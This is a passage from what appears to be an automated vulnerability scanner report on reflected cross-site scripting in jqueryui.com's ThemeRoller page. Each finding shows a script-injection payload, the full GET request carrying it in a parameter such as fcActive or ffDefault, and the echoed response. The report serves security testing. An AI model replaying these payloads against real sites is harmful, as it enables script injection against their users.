<link rel="stylesheet" href="/themeroller/css/parseTheme.css.php?ctl=themeroller&ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5pxd9f44"><script>alert(1)</script>d3edcd87640&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bg
...[SNIP]...

1.106. http://jqueryui.com/themeroller/ [cornerRadiusShadow parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the cornerRadiusShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 329c0"><script>alert(1)</script>3b31ba1242c was submitted in the cornerRadiusShadow parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px329c0"><script>alert(1)</script>3b31ba1242c HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 00:27:09 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120176

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
yOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px329c0"><script>alert(1)</script>3b31ba1242c" type="text/css" media="all" />
...[SNIP]...

1.107. http://jqueryui.com/themeroller/ [fcActive parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the fcActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ce384"><script>alert(1)</script>8be2803e357 was submitted in the fcActive parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009ce384"><script>alert(1)</script>8be2803e357&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 00:24:03 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120176

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009ce384"><script>alert(1)</script>8be2803e357&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTe
...[SNIP]...

1.108. http://jqueryui.com/themeroller/ [fcContent parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the fcContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4bb1d"><script>alert(1)</script>de8f868a8ad was submitted in the fcContent parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=2222224bb1d"><script>alert(1)</script>de8f868a8ad&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 00:21:52 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120176

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
cityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=2222224bb1d"><script>alert(1)</script>de8f868a8ad&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover
...[SNIP]...

1.109. http://jqueryui.com/themeroller/ [fcDefault parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the fcDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 18b11"><script>alert(1)</script>a2e8a91da20 was submitted in the fcDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e18b11"><script>alert(1)</script>a2e8a91da20&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 00:22:39 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120176

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
acityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e18b11"><script>alert(1)</script>a2e8a91da20&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_
...[SNIP]...

1.110. http://jqueryui.com/themeroller/ [fcError parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the fcError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9534a"><script>alert(1)</script>e23bebcd3cd was submitted in the fcError parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a9534a"><script>alert(1)</script>e23bebcd3cd&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 00:25:31 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120176

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
gOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a9534a"><script>alert(1)</script>e23bebcd3cd&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&
...[SNIP]...

1.111. http://jqueryui.com/themeroller/ [fcHeader parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the fcHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ef18f"><script>alert(1)</script>cbc15d48ea3 was submitted in the fcHeader parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffffef18f"><script>alert(1)</script>cbc15d48ea3&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 00:21:10 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120176

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
ucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffffef18f"><script>alert(1)</script>cbc15d48ea3&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextu
...[SNIP]...

1.112. http://jqueryui.com/themeroller/ [fcHighlight parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the fcHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 70142"><script>alert(1)</script>0a19df9f4d8 was submitted in the fcHighlight parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=36363670142"><script>alert(1)</script>0a19df9f4d8&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 00:24:45 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120176

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
Active=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=36363670142"><script>alert(1)</script>0a19df9f4d8&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_fl
...[SNIP]...

1.113. http://jqueryui.com/themeroller/ [fcHover parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the fcHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e8284"><script>alert(1)</script>59c021d2b9b was submitted in the fcHover parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987e8284"><script>alert(1)</script>59c021d2b9b&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 00:23:21 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120176

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987e8284"><script>alert(1)</script>59c021d2b9b&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHig
...[SNIP]...

1.114. http://jqueryui.com/themeroller/ [ffDefault parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the ffDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 69603"><script>alert(1)</script>617b0eaff01 was submitted in the ffDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif69603"><script>alert(1)</script>617b0eaff01&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 00:20:15 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120176

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
<link rel="stylesheet" href="/themeroller/css/parseTheme.css.php?ctl=themeroller&ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif69603"><script>alert(1)</script>617b0eaff01&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorCont
...[SNIP]...

1.115. http://jqueryui.com/themeroller/ [fsDefault parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

